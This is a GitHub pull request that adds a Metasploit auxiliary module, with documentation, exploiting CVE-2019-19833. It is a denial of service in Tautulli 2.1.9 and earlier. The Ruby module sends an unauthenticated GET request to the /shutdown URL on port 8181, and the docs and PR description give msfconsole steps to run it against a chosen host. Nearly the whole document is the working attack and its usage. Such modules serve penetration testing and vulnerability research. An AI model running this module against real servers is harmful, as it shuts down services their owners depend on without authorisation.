### PR TITLE
add exploit module tautulli_shutdown_exec [ CVE-2019-19833 ]

### DIFF
--- a/documentation/modules/auxiliary/dos/http/tautulli_shutdown_exec.md
+++ b/documentation/modules/auxiliary/dos/http/tautulli_shutdown_exec.md
@@ -20,7 +20,7 @@ Python Version: 2.7.11 (v2.7.11:6d1b6a68f775, Dec 5 2015, 20:40:30) [MSC v.1500 
 ```
 use auxiliary/dos/http/tautulli_shutdown_exec
 set RHOSTS XXX.XXX.XXX.XXX
-exploit
+run
 ```
 
 ## References :

--- a/documentation/modules/auxiliary/dos/http/tautulli_shutdown_exec.md
+++ b/documentation/modules/auxiliary/dos/http/tautulli_shutdown_exec.md
@@ -1,0 +1,29 @@
+# Tautulli 2.1.9 - Shutdown Denial of Service
+
+## Overview
+Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.
+
+## Affected System Information :
+
+```
+Date: 2018-12-17 
+Exploit Author: Ismail Tasdelen
+Vendor Homepage: https://tautulli.com/
+Software : https://github.com/Tautulli/Tautulli
+Product Version: v2.1.9
+Platform: Windows 10 (10.0.18362)
+Python Version: 2.7.11 (v2.7.11:6d1b6a68f775, Dec 5 2015, 20:40:30) [MSC v.1500 64 bit (AMD64)]
+```
+
+## Using
+
+```
+use auxiliary/dos/windows/http/tautulli_shutdown_exec
+set RHOSTS XXX.XXX.XXX.XXX
+exploit
+```
+
+## References :
+
+CVE:2019-19833
+EDB:47785

--- a/documentation/modules/auxiliary/dos/http/tautulli_shutdown_exec.md
+++ b/documentation/modules/auxiliary/dos/http/tautulli_shutdown_exec.md
@@ -18,6 +18,7 @@ Python Version: 2.7.11 (v2.7.11:6d1b6a68f775, Dec 5 2015, 20:40:30) [MSC v.1500 
 ## Using
 
 ```
+msfconsole -q
 use auxiliary/dos/http/tautulli_shutdown_exec
 set RHOSTS XXX.XXX.XXX.XXX
 run

--- a/documentation/modules/auxiliary/dos/http/tautulli_shutdown_exec.md
+++ b/documentation/modules/auxiliary/dos/http/tautulli_shutdown_exec.md
@@ -18,7 +18,7 @@ Python Version: 2.7.11 (v2.7.11:6d1b6a68f775, Dec 5 2015, 20:40:30) [MSC v.1500 
 ## Using
 
 ```
-use auxiliary/dos/windows/http/tautulli_shutdown_exec
+use auxiliary/dos/http/tautulli_shutdown_exec
 set RHOSTS XXX.XXX.XXX.XXX
 exploit
 ```

--- a/modules/auxiliary/dos/http/tautulli_shutdown_exec.rb
+++ b/modules/auxiliary/dos/http/tautulli_shutdown_exec.rb
@@ -1,0 +1,38 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize
+    super(
+      'Name'        => 'Tautulli v2.1.9 - Shutdown Denial of Service',
+      'Description' => 'Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.',
+      'Author'      => 'Ismail Tasdelen',
+      'License'     => MSF_LICENSE,
+      'References'  =>
+      [
+        ['CVE', '2019-19833'],
+        ['EDB', '47785']
+      ]
+    )
+    register_options([ Opt::RPORT(8181) ])
+  end
+
+  def run
+    res = send_request_raw({
+      'method' => 'GET',
+      'uri' => '/shutdown'
+    })
+
+    if res
+      print_status("Request sent to #{rhost}")
+    else
+      print_status("No reply from #{rhost}")
+    end
+  rescue Errno::ECONNRESET
+    print_status('Connection reset')
+  end
+end


### PR DESCRIPTION
Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use auxiliary/dos/http/tautulli_shutdown_exec`
- [ ] `set RHOSTS XXX.XXX.XXX.XXX`
- [ ] `run`

## PoC

![72550314-80cd8a00-38a3-11ea-9bad-942668a29390](https://user-images.githubusercontent.com/15425071/72602337-29bdc880-3928-11ea-8aec-ddadb3ff4f2d.png)
